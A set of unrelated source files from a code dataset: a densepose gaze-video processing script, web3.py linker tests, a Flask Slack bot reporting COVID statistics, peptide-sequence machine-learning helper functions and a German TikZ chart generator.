dtype=np.float32)\n frame = frame[:, :, :]\n xy = row[[\"gaze x [px]\", \"gaze y [px]\"]].to_numpy(dtype=np.int32)\n # Get the densepose data\n if args.inference and num_processed_frames == 0:\n import torch\n\n if torch.cuda.is_available():\n logging.info(\"Creating logger for inference times\")\n starter, ender = torch.cuda.Event(\n enable_timing=True\n ), torch.cuda.Event(enable_timing=True)\n repetitions = 400\n timings = np.zeros((repetitions, 1))\n else:\n error = (\n \"CUDA not available, disable inference with --no-inference\"\n )\n logging.error(error)\n raise Exception(error)\n elif not args.inference and num_processed_frames == 0:\n starter, ender, timings = None, None, None\n\n (\n frame,\n _,\n id_name,\n starter,\n ender,\n timings,\n poses_task,\n ) = pose.get_densepose(\n frame,\n predictor,\n visualizer,\n extractor,\n cfg,\n xy,\n starter,\n ender,\n timings,\n args.circle_size,\n frameid=num_processed_frames,\n progress_bar=progress_bar,\n poses_task=poses_task,\n ) # frame must be BGR\n\n # Add id_name to the dataframe\n merged_video.loc[num_processed_frames, \"densepose\"] = id_name\n # Add the closest annotation\n current_ts = row[\"timestamp [ns]\"]\n # Find the closest event name using the timestamp\n closest_event = events_df.iloc[\n (events_df[\"timestamp [ns]\"] - current_ts).abs().argsort()[:1]\n ]\n merged_video.loc[\n num_processed_frames, \"closest_annotation\"\n ] = closest_event[\"name\"].values[0]\n # make a circle on the gaze\n if not np.isnan(xy).any():\n cv2.circle(frame, xy, args.circle_size, (0, 0, 255), 10)\n\n # Finally get the frame ready.\n out_ = cv2.normalize(frame, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n if args.vis:\n cv2.imshow(\"Merged Video\", out_)\n if cv2.waitKey(25) & 0xFF == ord(\"q\"):\n break\n # Convert to av frame\n cv2.cvtColor(out_, cv2.COLOR_BGR2RGB, out_)\n np.expand_dims(out_, axis=2)\n out_frame = av.VideoFrame.from_ndarray(out_, format=\"rgb24\")\n for packet in out_video.encode(out_frame):\n out_container.mux(packet)\n if num_processed_frames % 100 == 0:\n logging.info(\n f\"Processed {num_processed_frames} frames out of {merged_video.shape[0]}\"\n )\n progress_bar.advance(video_task)\n progress_bar.refresh()\n num_processed_frames += 1\n progress_bar.stop_task(video_task)\n for packet in out_video.encode(None):\n out_container.mux(packet)\n if args.inference:\n logging.info(\n f\"Mean inference time: {np.sum(timings) / repetitions } per frame\"\n )\n logging.info(f\"STD inference time: {np.std(timings)} per frame\")\n progress_bar.remove_task(poses_task)\n # audio\n if audio_stream_available:\n audio_task = progress_bar.add_task(\n \"🔊 Processing audio\", total=merged_audio.shape[0]\n )\n num_processed_frames = 0\n lpts = -1\n while num_processed_frames < merged_audio.shape[0]:\n row = merged_audio.iloc[num_processed_frames]\n aud_frame, lpts = get_frame(\n audio, int(row[\"ptsaudio\"]), lpts, aud_frame, audio=True\n )\n if aud_frame is None:\n break\n aud_frame.pts = None\n af = out_audio.encode(aud_frame)\n out_container.mux(af)\n num_processed_frames += 1\n progress_bar.advance(audio_task)\n progress_bar.refresh()\n progress_bar.stop_task(audio_task)\n for packet in out_audio.encode(None):\n out_container.mux(packet)\n out_container.close()\n # save the csv\n merged_video.to_csv(args.out_csv, index=False)\n logging.info(f\"CSV file saved at: {args.out_csv}\")\n # Save the visualisation Gazemap\n pl_dp_vis.report(merged_video, args.output_path)\n logging.info(\n \"[white bold on #0d122a]◎ Mischief managed! 
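# Stand-alone sketch of the torch.cuda.Event timing pattern used above.
# Requires a CUDA device; synchronize() is what makes elapsed_time() valid,
# because GPU kernels run asynchronously. The matmul stands in for inference.
import torch

if torch.cuda.is_available():
    starter = torch.cuda.Event(enable_timing=True)
    ender = torch.cuda.Event(enable_timing=True)
    x = torch.randn(1024, 1024, device="cuda")
    starter.record()
    y = x @ x
    ender.record()
    torch.cuda.synchronize()
    print(f"{starter.elapsed_time(ender):.3f} ms")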
⚡️[/]\",\n extra={\"markup\": True},\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pupil-labs/densepose-module","sub_path":"src/pupil_labs/dense_pose/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":14877,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"36667783629","text":"import pytest\n\nfrom eth_utils import (\n remove_0x_prefix,\n to_hex,\n)\nfrom eth_utils.toolz import (\n assoc,\n)\n\nfrom ethpm.uri import (\n create_latest_block_uri,\n)\nfrom web3.tools.pytest_ethereum._utils import (\n contains_matching_uri,\n insert_deployment,\n pluck_matching_uri,\n)\nfrom web3.tools.pytest_ethereum.exceptions import (\n LinkerError,\n)\n\n\n@pytest.fixture\ndef chain_setup(w3):\n old_chain_id = remove_0x_prefix(to_hex(w3.eth.get_block(0)[\"hash\"]))\n block_hash = remove_0x_prefix(to_hex(w3.eth.get_block(\"earliest\").hash))\n old_chain_uri = f\"blockchain://{old_chain_id}/block/{block_hash}\"\n match_data = {\n old_chain_uri: {\"x\": \"x\"},\n f\"blockchain://1234/block/{block_hash}\": {\"x\": \"x\"},\n }\n no_match_data = {\n f\"blockchain://56775ac59d0774e6b603a79c4218efeb5653b99ba0ff14db983bac2662251a8a/block/{block_hash}\": { # noqa: E501\n \"x\": \"x\"\n }\n }\n return w3, match_data, no_match_data, old_chain_uri\n\n\ndef test_pluck_matching_uri(chain_setup):\n w3, match_data, no_match_data, old_chain_uri = chain_setup\n\n assert pluck_matching_uri(match_data, w3) == old_chain_uri\n with pytest.raises(LinkerError):\n assert pluck_matching_uri(no_match_data, w3)\n\n\ndef test_contains_matching_uri(chain_setup):\n w3, match_data, no_match_data, _ = chain_setup\n\n assert contains_matching_uri(match_data, w3) is True\n assert contains_matching_uri(no_match_data, w3) is False\n\n\ndef test_insert_deployment(escrow_deployer):\n w3 = escrow_deployer.package.w3\n escrow_package = escrow_deployer.package\n init_deployment_data = {\n \"contract_type\": \"Escrow\",\n \"address\": \"0x\",\n \"transaction\": \"0x\",\n \"block\": \"0x\",\n }\n new_deployment_data = {\n \"contract_type\": \"Escrow\",\n \"address\": \"0x123\",\n \"transaction\": \"0x123\",\n \"block\": \"0x123\",\n }\n w3.testing.mine(1)\n init_block_uri = create_latest_block_uri(w3, 0)\n alt_block_uri = init_block_uri[:15] + \"yxz123\" + init_block_uri[21:]\n init_block_deployment_data = {\n init_block_uri: {\"Other\": {\"x\": \"x\"}, \"Escrow\": init_deployment_data},\n alt_block_uri: {\"alt\": {\"x\": \"x\"}},\n }\n w3.testing.mine(1)\n new_block_uri = create_latest_block_uri(w3, 0)\n escrow_package.manifest = assoc(\n escrow_package.manifest, \"deployments\", init_block_deployment_data\n )\n updated_manifest = insert_deployment(\n escrow_package, \"Escrow\", new_deployment_data, new_block_uri\n )\n expected_deployments_data = {\n new_block_uri: {\"Other\": {\"x\": \"x\"}, \"Escrow\": new_deployment_data},\n alt_block_uri: {\"alt\": {\"x\": \"x\"}},\n }\n assert updated_manifest[\"deployments\"] == expected_deployments_data\n","repo_name":"ethereum/web3.py","sub_path":"tests/core/tools/pytest_ethereum/test_linker_utils.py","file_name":"test_linker_utils.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":4510,"dataset":"github-code","pt":"37"} +{"seq_id":"18735934277","text":"import json\nimport requests\nimport os\nimport errno\nfrom datetime import datetime\nfrom flask import Flask, Response\nfrom slackeventsapi import SlackEventAdapter\nfrom threading import Thread\nfrom 
slack import WebClient\n\n# This `app` represents your existing Flask app\napp = Flask(__name__)\n\n# greetings = [\"hello\", \"hello there\", \"hey\"]\nstates = [\"alaska\", \"alabama\", \"arkansas\", \"american samoa\", \"arizona\", \"california\", \"colorado\", \"connecticut\",\n \"district \", \"of columbia\", \"delaware\", \"florida\", \"georgia\", \"guam\", \"hawaii\", \"iowa\", \"idaho\", \"illinois\",\n \"indiana\", \"kansas\", \"kentucky\", \"louisiana\", \"massachusetts\", \"maryland\", \"maine\", \"michigan\", \"minnesota\",\n \"missouri\", \"mississippi\", \"montana\", \"north carolina\", \"north dakota\", \"nebraska\", \"new hampshire\",\n \"new jersey\", \"new mexico\", \"nevada\", \"new york\", \"ohio\", \"oklahoma\", \"oregon\", \"pennsylvania\", \"puerto rico\",\n \"rhode island\", \"south carolina\", \"south dakota\", \"tennessee\", \"texas\", \"utah\", \"virginia\", \"virgin islands\",\n \"vermont\", \"washington\", \"wisconsin\", \"west Virginia\", \"wyoming\"]\ncountries = ['Germany', 'France', 'China', 'United States']\nhelp_command = ['help']\n\n\nSLACK_SIGNING_SECRET = ''\nslack_token = ''\nVERIFICATION_TOKEN = ''\n\n# instantiating slack client\nslack_client = WebClient(slack_token)\n\n\n# An example of one of your Flask app's routes\n@app.route(\"/\")\ndef event_hook(request):\n json_dict = json.loads(request.body.decode(\"utf-8\"))\n if json_dict[\"token\"] != VERIFICATION_TOKEN:\n return {\"status\": 403}\n\n if \"type\" in json_dict:\n if json_dict[\"type\"] == \"url_verification\":\n response_dict = {\"challenge\": json_dict[\"challenge\"]}\n return response_dict\n return {\"status\": 500}\n return\n\n\nslack_events_adapter = SlackEventAdapter(\n SLACK_SIGNING_SECRET, \"/slack/events\", app\n)\n\n\n@slack_events_adapter.on(\"app_mention\")\ndef handle_message(event_data):\n def send_reply(value):\n event_data = value\n message = event_data[\"event\"]\n if message.get(\"subtype\") is None:\n command = message.get(\"text\")\n channel_id = message[\"channel\"]\n if any(item in command.lower() for item in help_command):\n message = \"@ me with any country, statefor detailed information. 
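# The handler above acknowledges the Slack event immediately and does the slow
# work in a Thread, since Slack retries events that are not answered quickly.
# Minimal sketch of that ack-then-work pattern; do_work is a placeholder.
from threading import Thread
from flask import Response

def handle_event(event_data):
    def do_work(value):
        print("processing", value)  # slow API calls would go here

    Thread(target=do_work, kwargs={"value": event_data}).start()
    return Response(status=200)  # return 200 right away so Slack does not retry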
For specific counties, use 'county '.\"\n slack_client.chat_postMessage(channel=channel_id, text=message)\n elif any(state in command.lower() for state in states): # US states\n my_state = (command.split('>')[1].lstrip().title())\n response_data = get_state_stats(my_state)\n message = \"State: {} --- Cases: {} --- Deaths: {} --- Active: {}\" \\\n .format(response_data['state'], response_data['cases'], response_data['deaths'],\n response_data['active'])\n slack_client.chat_postMessage(channel=channel_id, text=message)\n elif any(country in command for country in countries):\n my_country = (command.split('>')[1].lstrip().title())\n response_data = get_country_stats(my_country)\n message = \"Country: {} --- Cases: {} --- Deaths: {} --- Active: {}\"\\\n .format(response_data['country'], response_data['cases'], response_data['deaths'], response_data['active'])\n slack_client.chat_postMessage(channel=channel_id, text=message)\n elif command.split('> ')[1].split(' ')[0] == 'county':\n # <> county Santa Clara\n my_county = (command.split('county ')[1])\n print('county command: -{}-'.format(my_county))\n response_data = get_county_stats(my_county)\n print(response_data)\n message = \"County: {} --- Cases: {} --- Deaths: {} --- Recovered: {}\" \\\n .format(response_data['county'], response_data['cases'], response_data['deaths'], response_data['recovered'])\n slack_client.chat_postMessage(channel=channel_id, text=message)\n else:\n print('unknown command')\n message = 'Unknown command'\n slack_client.chat_postMessage(channel=channel_id, text=message)\n\n thread = Thread(target=send_reply, kwargs={\"value\": event_data})\n thread.start()\n return Response(status=200)\n\n\ndef get_state_stats(state):\n query = 'https://disease.sh/v3/covid-19/states?sort=cases&yesterday=false'\n full_data = (requests.get(query))\n if full_data.status_code == 200:\n json_data = json.loads(full_data.text)\n\n # return (json_data)\n counter = 0\n for num in json_data:\n if num['state'] == state:\n response = json_data[counter]\n counter = counter + 1\n print(response)\n return {'state': state, 'cases': response['cases'], 'deaths': response['deaths'], 'active': response['active']}\n\n\ndef get_country_stats(country):\n query = 'https://disease.sh/v3/covid-19/countries/{}?yesterday=true&strict=true'.format(country)\n full_data = (requests.get(query))\n if full_data.status_code == 200:\n json_data = json.loads(full_data.text)\n return {'country': country, 'cases': json_data['cases'], 'deaths': json_data['deaths'],\n 'active': json_data['active']}\n\n\ndef get_county_stats(county):\n query = 'https://disease.sh/v3/covid-19/jhucsse/counties/{}'.format(county)\n full_data = (requests.get(query))\n if full_data.status_code == 200:\n json_data = json.loads(full_data.text)\n return {'county': county, 'cases': json_data[0]['stats']['confirmed'], 'deaths': json_data[0]['stats']['deaths'],\n 'recovered': json_data[0]['stats']['recovered']}\n\n\n# Start the server on port 3000\nif __name__ == \"__main__\":\n app.run(port=3000)\n\n","repo_name":"PikaPreme/COVID19-SlackBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6703881631","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport seaborn as sns\nfrom matplotlib.patches import Rectangle\nfrom IPython.display import display\nfrom scipy.stats import hmean\nfrom sklearn.metrics import 
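# The disease.sh helpers above fall through and return None implicitly when
# the HTTP status is not 200, which the caller then crashes on. A slightly
# more defensive sketch of the same lookup (illustrative, same endpoint family):
import requests

def get_country_cases(country):
    resp = requests.get(f"https://disease.sh/v3/covid-19/countries/{country}")
    if resp.status_code != 200:
        return None  # explicit, so callers can handle the failure
    data = resp.json()
    return {"country": country, "cases": data.get("cases")}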
precision_recall_curve, confusion_matrix, accuracy_score, roc_auc_score, f1_score, \\\n precision_score, recall_score, average_precision_score\nimport matplotlib.pyplot as plt\n\n\ndef load_and_filter_dataset(path_dfvz='../DataFiles/experimental_data_set.csv',\n path_df20='../DataFiles/df20.csv',\n apply_filter='CPXXX'):\n \"\"\"\n Loads dfvz and df20 dataframes based on provided paths. Can also apply filter to the data as needed.\n Args:\n path_dfvz: filepath to dfvz (default '../DataFiles/experiment_data_set.csv')\n path_df20: filepath to df20 (default '../DataFiles/df20.csv')\n apply_filter: Indicates which type of filter to apply None, 'CPXXX', 'PXXX','C' (default 'CPXXX')\n\n Returns:\n Returns dfvz, df20\n \"\"\"\n\n dfvz = pd.read_csv(path_dfvz, engine='c', index_col=0)\n df20 = pd.read_csv(path_df20, engine='c', index_col=0)\n len_before_filter = np.array([len(dfvz), len(df20)])\n\n if apply_filter is not None:\n idx_filtered = filter_data_idx(dfvz, apply_filter)\n dfvz = dfvz.loc[idx_filtered]\n df20 = df20.loc[idx_filtered]\n len_after_filter = np.array([len(dfvz), len(df20)])\n print(f'Len Before Filtering for DFVZ and DF20: {len_before_filter}\\nLen After Filter: {len_after_filter}')\n\n return dfvz, df20\n\n\ndef filter_data_idx(df, filter_seqs='CPXXX'):\n \"\"\"\n Take in a data frame and returns an index of items that should remain once the filter is applied.\n Args:\n df: dataframe to use for filtering. Must contain a column name 'seq' that has sequences to filter from.\n filter_seqs: String. Must be one of 'CPXXX', 'PXXX', 'C' indicating the type of filter to apply (default 'CPXXX')\n\n Returns:\n Returns none if an incorrect filter_seqs argument is provided.\n Otherwise, returns the index as a list of the sequences that should remain in\n the df after applying the filter\n \"\"\"\n # Remove all sequences with C, PXXX but not PPXX\n # Find all sequences containing cysteines:\n filter_cysteine = df['seq'].str.contains('C')\n # Find all sequences containing PXXX but not PPXX\n filter_pxxx = df['seq'].str.contains('(^P[^P])')\n # Finding all sequences that either contain a C or PPXX or both\n filter_c_pxxx = df['seq'].str.contains('(^P[^P])|([C])')\n\n print(f\"\"\"\n DF Contains: \n Sequences Containing C: {np.count_nonzero(filter_cysteine)}\n Sequences Containing PXXX (Not PPXX): {np.count_nonzero(filter_pxxx)}\n Combine the two above filters with or: {np.count_nonzero(filter_c_pxxx)} \n \"\"\")\n\n if filter_seqs.upper() == 'C':\n idx_inverted = df[~filter_cysteine].index.to_list()\n elif filter_seqs.upper() == 'PXXX':\n idx_inverted = df[~filter_pxxx].index.to_list()\n elif filter_seqs.upper() == 'CPXXX':\n idx_inverted = df[~filter_c_pxxx].index.to_list()\n else:\n print('Invalid Filter Entry. Please select one of these options: \"C\", \"PXXX\", \"CPXXX\"')\n return None\n\n return idx_inverted\n\n\ndef pre_process_data(dfvz, df20, threshold=0.05):\n \"\"\"\n Scale and pre-process data and store it in a dictionary that can be easily accessed!\n\n Args:\n dfvz: dfvz dataframe containing chemical features\n df20: df20 dataframe containing sequence patterns\n threshold: threshold to use to mark high and low classes. I.e what percentile of the population will be\n labelled 'HIGH'. Same threshold is used for 'LOW'. 
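# str.contains() with capturing groups such as (^P[^P]) triggers a pandas
# UserWarning ("this pattern has match groups"); non-capturing (?:...) keeps
# the identical boolean result. Tiny demonstration on synthetic sequences:
import pandas as pd

seqs = pd.Series(["PAXX", "PPXX", "ACDE", "WCYK"])
has_c_or_pxxx = seqs.str.contains(r"(?:^P[^P])|C")
print(has_c_or_pxxx.tolist())  # [True, False, True, True]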
Be default this is set to top 5 percentile and bottom\n 5 percentile (0.05)\n\n Returns:\n X_dict: dictionary of features (both unscaled and scaled)\n Xname_dict: dictionary of feature keys and corresponding column names from dataframes\n y_dict: dictionary containing labels encoded in 4 different formats ('real', '3class', 'low', 'high')\n \"\"\"\n\n standard_scaler = preprocessing.StandardScaler()\n\n Xp = df20.loc[:, '..AA':'V...'].values # sequence pattern descriptors #(67278, 2396)\n Xp_names = df20.loc[:, '..AA':'V...'].columns\n standard_scaler.fit(Xp)\n Xp_s = standard_scaler.transform(Xp)\n\n Xz = dfvz.loc[:, 'z1.1':'z4.3'].values # zscale descriptors #(67278, 12)\n Xz_names = dfvz.loc[:, 'z1.1':'z4.3'].columns\n standard_scaler.fit(Xz)\n Xz_s = standard_scaler.transform(Xz)\n\n Xv = dfvz.loc[:, 'vhse1.1':'vhse4.8'].values # vhse descriptors #(67278, 32)\n Xv_names = dfvz.loc[:, 'vhse1.1':'vhse4.8'].columns\n standard_scaler.fit(Xv)\n Xv_s = standard_scaler.transform(Xv)\n\n Xvz_names = list(Xz_names) + list(Xv_names) # zscale and vhse combined #(67278, 44)\n Xvz = dfvz.loc[:, Xvz_names].values\n standard_scaler.fit(Xvz)\n Xvz_s = standard_scaler.transform(Xvz)\n\n Xpvz_names = list(Xvz_names) + list(Xp_names) # pattern and zscale, vhse combined #(67278, 2440)\n Xpvz = pd.concat([dfvz.loc[:, Xvz_names], df20.loc[:, list(Xp_names)]], axis=1).values\n standard_scaler.fit(Xpvz)\n Xpvz_s = standard_scaler.transform(Xpvz)\n\n y = dfvz['log.label'].values.reshape(-1, 1)\n\n # The following dictionary makes it much easier to main and access data.\n keys = ['Xp', 'Xp_s', 'Xz', 'Xz_s', 'Xv', 'Xv_s', 'Xvz', 'Xvz_s', 'Xpvz', 'Xpvz_s']\n vals = [Xp, Xp_s, Xz, Xz_s, Xv, Xv_s, Xvz, Xvz_s, Xpvz, Xpvz_s]\n name_vals = [Xp_names, Xp_names, Xz_names, Xz_names, Xv_names, Xv_names, Xvz_names, Xvz_names, Xpvz_names,\n Xpvz_names]\n\n X_dict = dict(zip(keys, vals))\n Xname_dict = dict(zip(keys, name_vals))\n\n # Y - Values, subdivided according to this:\n # Real: Real Values used for regressor\n # 3class: 0, 1, 2 - Bottom 5%, Middle 90%, Top 5%\n threshold = threshold\n y_three_class = pd.qcut(dfvz['log.label'], q=[0, threshold, 1 - threshold, 1], labels=False).values\n y_low = np.array([True if x == 0 else False for x in y_three_class])\n y_high = np.array([True if x == 2 else False for x in y_three_class])\n ykey = ['real', '3class', 'low', 'high']\n yval = [y, y_three_class, y_low, y_high]\n y_dict = dict(zip(ykey, yval))\n\n return X_dict, Xname_dict, y_dict\n\n\ndef ttlocate(seqx):\n aa = ['R', 'K', 'Q', 'E', 'D', 'N', 'Y', 'P', 'T', 'S', 'H', 'A', 'G', 'W', 'M', 'F', 'L', 'V', 'I', 'C']\n row_i1 = aa.index(seqx[0])\n row_i2 = aa.index(seqx[2])\n col_i1 = aa.index(seqx[1])\n col_i2 = aa.index(seqx[3])\n row_i = (row_i1 * 20) + row_i2\n col_i = (col_i1 * 20) + col_i2\n return (row_i, col_i)\n\n\n# function to get 20x20 matrix given array of aa sequences and DC label\ndef ttmatrix(seqs, dc):\n # define empty matrix to fill in\n ttmat = np.full((400, 400), np.nan)\n for i, s in enumerate(seqs):\n # ttmat[ttlocate(s)[0],ttlocate(s)[1]] = dc[i]\n ttmat[ttlocate(s)] = dc[i]\n mask = np.isnan(ttmat)\n return ttmat, mask\n\n\n# plot the ttmatrix, and highlight the query if present\ndef ttplot(seqs, \n dc, \n query=None, \n title='Position of queried sequence/s in 20x20 plot (log (deep conversion))',\n vmin=None,\n vmax=None):\n \"\"\"Plots a 20x20 Matrix based on provided Sequences and LogDC values. 
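# Compact sketch of the qcut-based labelling above: values are binned into
# bottom 5% / middle 90% / top 5%, and the two tails become the boolean
# LOW/HIGH targets. Synthetic data, default 0.05 threshold.
import numpy as np
import pandas as pd

vals = pd.Series(np.random.default_rng(0).normal(size=1000))
three_class = pd.qcut(vals, q=[0, 0.05, 0.95, 1], labels=False)
y_low, y_high = (three_class == 0).values, (three_class == 2).values
print(y_low.sum(), y_high.sum())  # roughly 50 rows in each tail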
The query is optional and draws a yellow\n square around the queried sequence\n\n Args:\n vmin:\n vmax:\n title:\n seqs ([String]): array of sequences to build the ttplot with\n dc ([Float]): array of log DC values corresponding description to the sequences.\n query (list, optional): List of query sequences to see where they might show up on the 20x20 Plot. Defaults to [].\n\n Returns:\n [type]: [description]\n \"\"\"\n if query is None:\n query = []\n ttmat, mask = ttmatrix(seqs, dc)\n\n aa = ['R', 'K', 'Q', 'E', 'D', 'N', 'Y', 'P', 'T', 'S', 'H', 'A', 'G', 'W', 'M', 'F', 'L', 'V', 'I', 'C']\n ticks = [[a[0]] + [''] * 19 for a in aa]\n ticks = [j for i in ticks for j in i]\n sns.set(rc={'figure.figsize': (9, 6)})\n sns.set(font_scale=1.3)\n\n # if dc values are binary then use simple color map\n if len(np.unique(dc)) == 2:\n cm = 'Blues'\n \n elif len(np.unique(dc)) == 3:\n cm = ['#2AB7CA', '#D6D6D6', '#FE4A49']\n \n else:\n cm = 'jet'\n\n# cm = 'Blues' if len(np.unique(dc)) == 2 else 'jet'\n # comment out above comment as we have new logic.\n\n ax = sns.heatmap(ttmat, cmap=cm, xticklabels=ticks, yticklabels=ticks, mask=mask, vmin=vmin, vmax=vmax)\n ax.set_title(title, pad=20)\n ax.set(facecolor='#F5F5F5')\n\n if len(query) > 0:\n for q in query:\n query_pos = ttlocate(q)[1], ttlocate(q)[0]\n ax.add_patch(Rectangle(query_pos, 1, 1, fill=True, edgecolor='red', lw=8))\n \n\n return ax.figure\n\n\ndef evalplots(y_test, y_score, y_pred, labels, name_modifier):\n precision, recall, thr = precision_recall_curve(y_test, y_score)\n average_precision = average_precision_score(y_test, y_score)\n f1score = f1_score(y_test, y_pred)\n f1vec = [hmean([precision[i], recall[i]]) for i in range(sum(recall != 0))]\n\n # plt.plot([i/len(f1vec) for i in range(len(f1vec))],f1vec,color='r',alpha=0.2)\n plt.step(recall, precision, color='b', alpha=0.2, where='post')\n plt.fill_between(recall, precision, step='post', alpha=0.2, color='b')\n\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.title('2-class Precision-Recall curve: AP={0:0.2f}, F1={1:0.2f}'.format(average_precision, f1score))\n plt.tight_layout()\n plt.savefig(f'figures/precision_recall_{name_modifier}.svg')\n plt.savefig(f'figures/precision_recall_{name_modifier}.png', dpi=300)\n plt.show()\n\n plt.step(thr[recall[:-1] != 0], f1vec, color='r', alpha=0.2, where='post')\n plt.fill_between(thr[recall[:-1] != 0], f1vec, step='post', alpha=0.2, color='r')\n plt.xlabel('Threshold')\n plt.ylabel('Estimated F1-Scores')\n plt.ylim([0.0, 1.0])\n plt.axvline(x=0.5, color='r')\n plt.title('Threshold Vs F1-Score: Max F1 ={0:0.2f}, Reported F1={1:0.2f}'.format(np.max(f1vec), f1score))\n plt.tight_layout()\n plt.savefig(f'figures/threshold_f1_{name_modifier}.svg')\n plt.savefig(f'figures/threshold_f1_{name_modifier}.png', dpi=300)\n plt.show()\n\n cm = confusion_matrix(y_test, y_pred, labels)\n print('Recall: {0:0.2f}'.format(recall_score(y_test, y_pred)))\n print('Precision: {0:0.2f}'.format(precision_score(y_test, y_pred)))\n display(pd.DataFrame(cm, columns=['Negative', 'Positive'], index=['Negative', 'Positive']))\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(cm, cmap='hot')\n print('\\n')\n plt.title('Confusion matrix : Acc={0:0.2f}'.format(accuracy_score(y_test, y_pred)))\n fig.colorbar(cax)\n ax.set_xticklabels([''] + labels)\n ax.set_yticklabels([''] + labels)\n plt.xlabel('Predicted')\n plt.ylabel('True')\n plt.show()\n 
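# Minimal sketch of reading a decision threshold off the precision/recall
# trade-off plotted above (the harmonic mean at each threshold is the F1).
# Scores below are synthetic, not the notebook's predictions.
import numpy as np
from sklearn.metrics import precision_recall_curve

y_true = np.array([0, 0, 1, 1, 1, 0, 1, 0])
y_score = np.array([0.1, 0.4, 0.35, 0.8, 0.7, 0.2, 0.6, 0.55])
prec, rec, thr = precision_recall_curve(y_true, y_score)
f1 = 2 * prec[:-1] * rec[:-1] / np.clip(prec[:-1] + rec[:-1], 1e-12, None)
print("best threshold:", thr[np.argmax(f1)], "best F1:", f1.max())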
print('--------------------------------------------------------')\n","repo_name":"sharyar/GESAR-V2","sub_path":"MLNotebooks/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":11140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17383079476","text":"#!/usr/bin/env python\n# coding: utf8\n\n#Inhalt\n\n#Aufruf:\n# exec(open(\"Funktionen/funktionen.py\").read())\n\ndef saeulenKreisStreifenDiagrammeZeichnen(werte=[['VW','Mercedes','Audi','BMW','Honda',],[250,200,180,170,100]],titel='Autos pro Stunde',typ='LSG',streifen=False):\n zuordnen=True if (typ=='zuordnen') else False\n zeichnenEinfarben=True if (typ=='ZeichnenUndEinfaerben') else False\n zeichnen=True if (typ=='Zeichnen') else False\n zeichnenUndBerechnen=True if (typ=='ZeichnenUndBerechnen') else False\n alles=True if (typ=='alles') else False\n farben=tikzFarben[1:]\n R=3\n pWerte=[x/sum(werte[1])*100 for x in werte[1]]\n if not zeichnenUndBerechnen:\n werte.append([F'{strNW(round(x+0.0000000001),True)} \\%' for x in pWerte])\n else:\n werte.append([' ' for x in pWerte])\n tikzcommand=['\\\\tikzstyle{background grid}=[draw, black!15,step=.5cm]']\n tikzcommand.append('\\\\begin{tikzpicture}[show background grid]')\n dia,hoehe=saeulenDiagrammTikzVorgBreiteHoehe(werte=werte,yAchse=[0,max(werte[1]),20],ylabel=titel,urspr=[0,0],mitUmrandung=False,gibHoeheZurueck=True,farben=farben,typ=typ)\n if not alles:\n tikzcommand=tikzcommand+dia\n if streifen:\n hoehe=hoehe+0.5\n tikzcommand=tikzcommand+tikzTabelle(tabelle=werte,dim=[2.0,0.5],newCBuchst='X',tabellenPos=[0,hoehe+3],mitUmrandung=False)\n if streifen:\n streifenUrsp=[0,hoehe]\n streifenL=10\n if not alles:\n tikzcommand.append(F'\\\\draw[draw=black] ({streifenUrsp[0]},{streifenUrsp[1]}) rectangle ++(10,1);')\n l = 0\n if not (zeichnen or zeichnenUndBerechnen or alles):\n for i in range(len(pWerte)):\n p = pWerte[i]\n if zeichnenEinfarben:\n tikzcommand.append(F'\\\\draw[thick] ({l},{streifenUrsp[1]}) rectangle ++({p/100*10},1);')\n else:\n tikzcommand.append( F'\\\\draw[thick,pattern=north west lines, pattern color={farben[i]}] ({l},{streifenUrsp[1]}) rectangle ++({p/100*10},1);')\n if not (zuordnen or zeichnenEinfarben):\n tikzcommand.append( F'\\\\node at ({l+p/100*10/2},{streifenUrsp[1] +0.5}) {{\\\\textbf{{ {werte[0][i]} }} }};')\n l=l+p/100*10\n else:\n kreisUrsp=[10,hoehe-R]\n if not alles:\n tikzcommand.append(F'\\\\draw ({kreisUrsp[0]},{kreisUrsp[1]}) circle ({R} cm);')\n tikzcommand.append(F'\\\\draw[fill=black] ({kreisUrsp[0]},{kreisUrsp[1]}) circle (0.05 cm);')\n w=0\n if not (zeichnen or zeichnenUndBerechnen or alles):\n for i in range(len(pWerte)):\n p=pWerte[i]\n if zeichnenEinfarben:\n tikzcommand.append(F'\\\\draw[thick] ({kreisUrsp[0]},{kreisUrsp[1]}) -- +({w}:{R}) arc ({w}:{w+p/100*360}:{R}) -- ({kreisUrsp[0]},{kreisUrsp[1]});')\n else:\n tikzcommand.append(F'\\\\draw[thick,pattern=north west lines, pattern color={farben[i]}] ({kreisUrsp[0]},{kreisUrsp[1]}) -- +({w}:{R}) arc ({w}:{w+p/100*360}:{R}) -- ({kreisUrsp[0]},{kreisUrsp[1]});')\n if not (zuordnen or zeichnenEinfarben):\n tikzcommand.append(F'\\\\node[rotate={w+p/100*360/2}] at ($({kreisUrsp[0]},{kreisUrsp[1]})+({w+p/100*360/2}:{R/2})$) {{\\\\textbf{{ {werte[0][i]} }} }};')\n w=w+p/100*360\n tikzcommand.append('\\\\end{tikzpicture}')\n return 
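# The pie-chart branch above converts each percentage share into arc degrees
# (p / 100 * 360) while accumulating a running start angle. The arithmetic in
# isolation, using the function's default car counts:
values = [250, 200, 180, 170, 100]
shares = [v / sum(values) * 100 for v in values]
start = 0.0
for share in shares:
    sweep = share / 100 * 360
    print(f"{start:7.2f} -> {start + sweep:7.2f} deg  ({share:.1f} %)")
    start += sweep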
